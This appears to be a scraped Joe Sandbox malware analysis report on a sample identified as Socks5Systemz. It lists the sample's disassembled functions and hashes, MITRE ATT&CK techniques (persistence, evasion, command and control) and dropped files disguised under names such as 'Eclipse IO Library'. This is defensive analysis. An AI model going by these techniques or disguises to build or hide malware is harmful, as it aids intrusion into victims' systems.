Instruction Fuzzy Hash: BDF0E5729001048BC709EF58E444AEAB776EF52711F5040AEFD065B390CB72DE4ACBE1

Function 02D638CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D638D2
std::runtime_error::runtime_error.LIBCPMT ref: 02D638F1

Part of subcall function 02D61410: std::exception::exception.LIBCMT ref: 02D61428

Part of subcall function 02D688C3: _memmove.LIBCMT ref: 02D688E3

Strings

Year is out of valid range: 1400..10000, xrefs: 02D638E0

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
String ID: Year is out of valid range: 1400..10000
API String ID: 3258419250-2344417016
Opcode ID: 64368eeffd35e03e2057b1cdc29b2a7daf4c9ee032fa689c223cc36bb65d0fd6
Instruction ID: ccd91f3acafac8a8bc4ffd15f1859b7a8b48a92168b5c3a2d55c28e00623281c
Opcode Fuzzy Hash: 64368eeffd35e03e2057b1cdc29b2a7daf4c9ee032fa689c223cc36bb65d0fd6
Instruction Fuzzy Hash: C7E0D872E4410497E714FFD89815BFDB776DB08B10F40044AD401A77C0DAB22D18CBA5

Function 02D63881 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D63886
std::runtime_error::runtime_error.LIBCPMT ref: 02D638A5

Part of subcall function 02D61410: std::exception::exception.LIBCMT ref: 02D61428

Part of subcall function 02D688C3: _memmove.LIBCMT ref: 02D688E3

Strings

Day of month value is out of range 1..31, xrefs: 02D63894

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
String ID: Day of month value is out of range 1..31
API String ID: 3258419250-1361117730
Opcode ID: 35c68124a36035b7671b7f16c95fdd103af46bc07e181b62cddc6c106e2ffca6
Instruction ID: 2ed07a54e20712f9054e95a94a7d5e9e8c04b9e7d48ef305eb4acc494bf6e24f
Opcode Fuzzy Hash: 35c68124a36035b7671b7f16c95fdd103af46bc07e181b62cddc6c106e2ffca6
Instruction Fuzzy Hash: 44E0D872E0010497E714BFD4D815BFDB776DB08B10F40044AD401B37C0DAB12D148BE5

Function 02D63919 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D6391E
std::runtime_error::runtime_error.LIBCPMT ref: 02D6393D

Part of subcall function 02D61410: std::exception::exception.LIBCMT ref: 02D61428

Part of subcall function 02D688C3: _memmove.LIBCMT ref: 02D688E3

Strings

Month number is out of range 1..12, xrefs: 02D6392C

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
String ID: Month number is out of range 1..12
API String ID: 3258419250-4198407886
Opcode ID: 811a7fe5c32e59cb9a65b591944277268f5ee2ac67847ec813dc09fa5b72338d
Instruction ID: 587c9e51e0e0fbb971cc0b93f21a8892ef897986a6b7e6289d1e471647fe8eab
Opcode Fuzzy Hash: 811a7fe5c32e59cb9a65b591944277268f5ee2ac67847ec813dc09fa5b72338d
Instruction Fuzzy Hash: 85E0D872E0010897E714BFD49815BFDB776DB18B10F50044AD801A37C0DAF12D148BE5

Function 02D619C2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 02D619CC
GetLastError.KERNEL32 ref: 02D619D9

Part of subcall function 02D61712: __EH_prolog.LIBCMT ref: 02D61717

Strings

tss, xrefs: 02D619E8

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: AllocErrorH_prologLast
String ID: tss
API String ID: 249634027-1638339373
Opcode ID: c22533d235717e47ff92d1b8c5723d0a2ee37f30e1aa273d38677dc7fbc021e0
Instruction ID: b237ee48bd1ac1c147cf411ee91f44167be3da393ed1f7a8d98beacf3d2d4cf4
Opcode Fuzzy Hash: c22533d235717e47ff92d1b8c5723d0a2ee37f30e1aa273d38677dc7fbc021e0
Instruction Fuzzy Hash: B4E08635D142109BC3007B78DC091ABBBA4DA41231F208B66ECBD833D0FB308D108BD6

Function 02D63BD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D63BD8
std::bad_exception::bad_exception.LIBCMT ref: 02D63BED

Part of subcall function 02D723F7: std::exception::exception.LIBCMT ref: 02D72401

Part of subcall function 02D6A58E: __EH_prolog.LIBCMT ref: 02D6A593
Part of subcall function 02D6A58E: __CxxThrowException@8.LIBCMT ref: 02D6A5BC

Strings

bad cast, xrefs: 02D63BE5

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
String ID: bad cast
API String ID: 1300498068-3145022300
Opcode ID: dd061c54d87e9ce57478e048fcc38d5a1977d9aed53e73eeacb057fdd531c124
Instruction ID: 829389a11f9e386e7a8fea826ac1c5e4eac9bc08b64f0021a9b675dc0cb6c548
Opcode Fuzzy Hash: dd061c54d87e9ce57478e048fcc38d5a1977d9aed53e73eeacb057fdd531c124
Instruction Fuzzy Hash: 77E01A719001099BC714EF94E545BBCB771EB15701F8080ADED06573D0DB359D55CAA5

Function 0040446C Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 00404494
HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044C8
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044E2
HeapFree.KERNEL32(00000000,?,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044F9

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
Instruction ID: 6532d2b8740b88ca5c68c93f46193dcc45771cdeba7f909f778517217a69801f
Opcode Fuzzy Hash: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
Instruction Fuzzy Hash: 02113670200301AFC731CF29EE45A627BB5FB847207104A3AF252E65F0D775A866EF19

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Socks5Systemz

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Eclipse IO Library 9.27.43\Eclipse IO Library 9.27.43.exe

C:\ProgramData\ec927it43.dat

C:\ProgramData\ec927rc43.dat

C:\ProgramData\ec927resa.dat

C:\ProgramData\ec927resb.dat

C:\Users\user\AppData\Local\Gerda Play3 SE\Qt5OpenGL.dll (copy)

C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

C:\Users\user\AppData\Local\Gerda Play3 SE\is-3CJHL.tmp

C:\Users\user\AppData\Local\Gerda Play3 SE\is-8SV2U.tmp

C:\Users\user\AppData\Local\Gerda Play3 SE\is-N5JHT.tmp

C:\Users\user\AppData\Local\Gerda Play3 SE\is-RDVP8.tmp

C:\Users\user\AppData\Local\Gerda Play3 SE\is-REN2E.tmp

C:\Users\user\AppData\Local\Gerda Play3 SE\is-T0OEI.tmp

C:\Users\user\AppData\Local\Gerda Play3 SE\is-UG21C.tmp

C:\Users\user\AppData\Local\Gerda Play3 SE\libeay32.dll (copy)

C:\Users\user\AppData\Local\Gerda Play3 SE\libssl-1_1.dll (copy)

Windows Analysis Report
file.exe

Function 00409B78 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27
libraryloaderCOMMON

Function 0040AAB4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 109
COMMON

Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Function 0040AAA2 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105
COMMON

Function 004099EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Function 00401918 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
memoryCOMMON

Function 0040A814 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
windowCOMMON

Function 0040A82F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
windowCOMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre